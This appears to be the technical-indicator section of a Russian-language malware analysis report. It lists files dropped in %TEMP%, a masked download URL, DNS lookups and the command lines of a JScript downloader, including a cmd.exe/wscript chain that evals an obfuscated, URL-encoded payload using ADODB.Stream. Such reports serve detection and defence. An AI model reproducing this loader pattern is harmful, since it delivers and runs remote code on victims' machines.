Техническая информация
- '%TEMP%\tmp235399.940'
- tmp235399.940
- %TEMP%\76782785.txt
- %TEMP%\tmp235399.940
- %TEMP%\silvan.cab
- %TEMP%\fluttering.dll
- %TEMP%\nswa831.tmp\system.dll
- http://www.ne####enadhanou.cz/nvdtime.prs
- DNS ASK ho##or.com
- DNS ASK ne####enadhanou.cz
- ClassName: '' WindowName: ''
- '<SYSTEM32>\wscript.exe' /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BbfsFL%3D%20%2891648%2C%22ne%22+%22w%20ActiveXObject%28%5C%22ADODB.Stream%5C%22%29%22%29%3BLPdYsEV%3D%20%2876738%2C%22%5C%5C%22+%22tmp23539...
- '<SYSTEM32>\cmd.exe' /c echo eval(unescape(WScript.Arguments(0))) > %TEMP%\76782785.TXT && timeout 3 && wscript /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BbfsFL%3D%20%2891648%2C%22ne%22+%22w%20ActiveXOb...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c echo eval(unescape(WScript.Arguments(0))) > %TEMP%\76782785.TXT && timeout 3 && wscript /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BbfsFL%3D%20%2891648%2C%22ne%22+%22w%20ActiveXOb...
- '<SYSTEM32>\timeout.exe' 3